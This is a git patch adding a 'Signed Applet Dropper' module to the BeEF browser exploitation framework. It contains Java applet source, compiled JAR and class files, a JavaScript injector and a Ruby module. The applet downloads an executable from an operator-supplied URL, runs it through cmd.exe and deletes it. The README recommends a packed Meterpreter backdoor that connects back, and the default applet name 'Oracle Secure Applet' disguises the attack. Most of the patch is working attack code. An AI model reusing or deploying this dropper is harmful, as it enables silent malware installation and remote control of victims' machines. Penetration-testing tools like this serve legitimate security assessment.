From b280d099f835ea50fd2158d86d4868feb940d8e8 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Tue, 8 Oct 2013 17:02:02 +0100 Subject: [PATCH] From antisnatchor with love. New module: Signed Java Applet dropper (win only for now). --- .../signed_applet_dropper/README.txt | 22 +++++ .../signed_applet_dropper/applet/SM.class | Bin 0 -> 276 bytes .../signed_applet_dropper/applet/SM.java | 13 +++ .../applet/SignedApplet.class | Bin 0 -> 2817 bytes .../applet/SignedApplet.jar | Bin 0 -> 3782 bytes .../applet/SignedApplet.java | 87 ++++++++++++++++++ .../signed_applet_dropper/command.js | 28 ++++++ .../signed_applet_dropper/config.yaml | 15 +++ .../signed_applet_dropper/module.rb | 30 ++++++ 9 files changed, 195 insertions(+) create mode 100644 modules/exploits/local_host/signed_applet_dropper/README.txt create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SM.class create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SM.java create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java create mode 100755 modules/exploits/local_host/signed_applet_dropper/command.js create mode 100755 modules/exploits/local_host/signed_applet_dropper/config.yaml create mode 100755 modules/exploits/local_host/signed_applet_dropper/module.rb diff --git a/modules/exploits/local_host/signed_applet_dropper/README.txt b/modules/exploits/local_host/signed_applet_dropper/README.txt new file mode 100644 index 000000000..3148891d4 --- /dev/null +++ b/modules/exploits/local_host/signed_applet_dropper/README.txt @@ -0,0 +1,22 @@ +--- How to use this module --- +-- antisnatchor: + - the applet has been compiled with Java 1.6.0 update 0 in order to be compatible with every JRE > 1.6.x (1.7.x included) + - tested with IE8 on XP SP3, and IE10 on Win7 + - tested with JRE 1.6.x and 1.7.x + + - I advise you to recompile/re-sign the applet yourself, the following are the required steps to compile and self-sign the applet. +NOTE: Best results are obtained signing the applet with a valid Code Signing certificate. + + - Ideally the dropper is a packed backdoor (Meterpreter?) that connects back to your server (for instance a Metasploit multi/handler). + +1. compile the two classes +javac SignedApplet.java SM.java + +2. create a JAR +jar cvf SignedApplet.jar SignedApplet.class SM.class + +3. generate a keystore to self-sign the applet +keytool -keystore tmp -genkey + +4. sign the applet +jarsigner -keystore tmp signedAppletCmdExec.jar mykey diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SM.class b/modules/exploits/local_host/signed_applet_dropper/applet/SM.class new file mode 100755 index 0000000000000000000000000000000000000000..e5e180b79d9ca74153b71df78bfc8c830df341ec GIT binary patch literal 276 zcmZ9G!D_-l5QhIrOj1*;XAd5FOM7UbSH+9q$&^CG`I z1_iFw5X6ua*J-#OH)t?0ERfPrgCP}Z4JJn9VzdUQ<3<&hT-+pY?^Th}Fa}%0CJYHU z8tSDf6Ip?qH7tWGMNYueumX93eHv}J0^E&q^&!~7-#d9j2 zm(ji;#ft(j3B0VJI&BW;M-@bpHyQhkM8>d36aAiR*`w_W#IR*wpLa6~RQWAycsKHE z+8MVqj*(WN>`@T3Y|B#+h&AuxVzZMr6)Z_wwz)MwHf*{(jNuG-LL23=P5wDvTHNm$ zslB~M)>jiGfmetQff0CB;58;p@8*6pmG^kNF4lZvcml68n2o7S*|OH}bM-2DX8@`&U;oSvE8uK&X|rabn18uZwtJm<6XQb z@V<^iIIQ5bh46IbtxVc<6`Ue9am$H&W7)LDqJE&`L+Rur9MSQy^c0LU6=`UPjt;pY zoLt;C#!Tj*<0y70sOs<4@d-Xvp!=R|(@X5!o|GXS(=mZb1uJ}o@tBO|73rn~HH z-ea*$!w>zl%3U5Qq0qSS#^*$7MJ2O8R!*sI+rSJ1V1aoCr+ZopGvC4bq?gDWd*;v*s+v@ z9TjrTX(u`wHN8H=W!XK+n>Dc$IeikEljF9z-%C0+yOdqV%zeg{TD8}2$$&AOBg3Rp)z(mBf+4HUcE9`Q2aE8?6 z%q)}k9HzX;bCS-u>25Z1?9oWh^!nN1uH_x*HEd&4qH@MO^YgXsa>UfnJ5ZWba$jSl zcBvWIt(Ac>zhn$&S^4?`g|rZ!Rmq0%y*144%`LL83$pPDNOf$mqq&REaVEmF1lL_% z(qQ#SCZFTPtWISdnQ*|#b5hoq%FY1#IA+WJ%g7pIdrmCPERLman}3VWveHI|eHWhX z#_f6Av&QI9V+m&#^%YF~DwntEHz>!fg0&~Zbq+&Gg_N1g@xmNW-zgj=RiS42JiEKRPP#%Z%=B1{T=tq0M-nYWzA zR?sA8U&(}`(T&OzZlJx0WdjokOrask@Rs)$v0`BT6dJb{aXJ;@DV)(3EMnzA5z&E$ z;1rssu&S*(9K=^@Td1`mRKS@RihA)HLWfY>P~8v;)QbXEA3FY50}(k(iZ$yCSQ~6# zek8g42qUP14F@qkWy;-%P_E>v35&6ct1}txYOKXsxEN~)L5$~`(T5i7!8#0KJ%-VW zQN*zq3I1<$Hm#k5EdO!pp`|#2$9YL80!e{hfvp1D1o{N72L8bkyGv{H?78T(El<{{k-L%I8yy^m$R~c+Vk(A{!`0Z{*^hmQR^Oh%d6E zGst!_OW-2rw1Jv7XlTcI*ofVv{U9m7k1*Xq%HKm~JVm0vN0J{V#XlmBM@hI(SepqX zeN^iZ{1=A>cJh}9R&@}%06Da4hL#)XU;flZ+9uH+X=YzY5e`gZ<3eWEkbfFKi%4~y L_jdDM6|VUYR!=S8@OvFgG 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 literal 0 HcmV?d00001 diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java new file mode 100755 index 000000000..697f5d59b --- /dev/null +++ b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java @@ -0,0 +1,87 @@ +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * + * author: antisnatchor +*/ +import java.applet.*; +import java.awt.*; +import java.io.*; +import java.util.*; +import java.net.URL; + +public class SignedApplet extends Applet { + + public static String debug = "false"; + public static String bin_url = ""; + public static String bin_path = ""; + public static boolean download = false; + + public void init(){ + bin_url = (String)getParameter("url"); + String bin_rand_name = Long.toString(Math.abs((new Random()).nextLong()), 36); + bin_path = System.getProperty("java.io.tmpdir") + File.separator + bin_rand_name + ".exe"; + + // grab operating system -> not used atm + // TODO: make the applet compatible also with Linux/OSX + String os = System.getProperty("os.name").toLowerCase(); + execute(); + } + + public SignedApplet(){ + super(); + SecurityManager sm = new SM(); + System.setSecurityManager(sm); + return; + } + + public static boolean download(){ + boolean success = false; + try{ + URL url = new URL(bin_url); + InputStream is = url.openStream(); + BufferedInputStream isbuf = new BufferedInputStream(is); + File bin_out = new File(bin_path); + OutputStream out = new BufferedOutputStream(new FileOutputStream(bin_out)); + byte[] buf = new byte[1024]; + for (;;){ + int bs = isbuf.read(buf); + if (bs <= 0) break; + out.write(buf, 0, bs); + } + out.flush(); + out.close(); + is.close(); + success = true; + return success; + }catch(Exception e){ + return success; + } + } + + public static String execute() { + String result = ""; + String command = ""; + try{ + boolean downloadOk = download(); + System.out.println("Download [" + downloadOk + "] - bin_path [" + bin_path + "]"); + result = "Download [" + downloadOk + "] - bin_path [" + bin_path + "]"; + + if(downloadOk){ + // TODO: make the applet compatible also with Linux/OSX + command = "cmd.exe /c \"" + bin_path + "\""; + Process p = Runtime.getRuntime().exec(command); + p.waitFor(); + /// delete dropped binary + new File(bin_path).delete(); + result += "\n\nExecution OK."; + }else{ + //downloading of dropper failed, catch error.. + result = "Download error."; + } + }catch (Exception e) { + result = "Exception!!!: \n"; + } + return result; + } +} diff --git a/modules/exploits/local_host/signed_applet_dropper/command.js b/modules/exploits/local_host/signed_applet_dropper/command.js new file mode 100755 index 000000000..3cd74f3b0 --- /dev/null +++ b/modules/exploits/local_host/signed_applet_dropper/command.js @@ -0,0 +1,28 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/applet/SignedApplet.jar'; + var applet_name = '<%= @applet_name %>'; + var dropper_url = '<%= @dropper_url %>'; + var ie_only = '<%= @ie_only %>'; + + function attach(){ + beef.dom.attachApplet('signed_applet', applet_name, 'SignedApplet.class', + null, applet_archive, [{'url':dropper_url}]); + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet added to the DOM.'); + } + + if(ie_only == "on"){ + if(beef.browser.isIE()){ + attach(); + } + }else{ + attach(); + } +}); diff --git a/modules/exploits/local_host/signed_applet_dropper/config.yaml b/modules/exploits/local_host/signed_applet_dropper/config.yaml new file mode 100755 index 000000000..4110ef9ec --- /dev/null +++ b/modules/exploits/local_host/signed_applet_dropper/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + signed_applet_dropper: + enable: true + category: ["Exploits", "Local Host"] + name: "Signed Applet Dropper" + description: "Injects a Signed Java Applet (compiled with Java 1.6.0 in order to be compatible with every JRE from 1.6.0 to latest 1.7) that downloads a dropper and executes it.
Currently works only on Windows.

Internet Explorer is the only browser that doesn't implement Click to Play for plugins, that's what the IE only checkbox is meant for." + authors: ["antisnatchor"] + target: + user_notify: ["All"] diff --git a/modules/exploits/local_host/signed_applet_dropper/module.rb b/modules/exploits/local_host/signed_applet_dropper/module.rb new file mode 100755 index 000000000..1cc350aa5 --- /dev/null +++ b/modules/exploits/local_host/signed_applet_dropper/module.rb @@ -0,0 +1,30 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Signed_applet_dropper < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar', '/applet/SignedApplet', 'jar') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SM.class', '/applet/SM', 'class') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class', '/applet/SignedApplet', 'class') + + end + + def self.options + @configuration = BeEF::Core::Configuration.instance + beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") + return [ + {'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'}, + {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'}, + {'name' => 'ie_only', 'ui_label' => 'Internet Explorer only?', 'type' => 'checkbox', 'checked' => 'checked' }, + + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end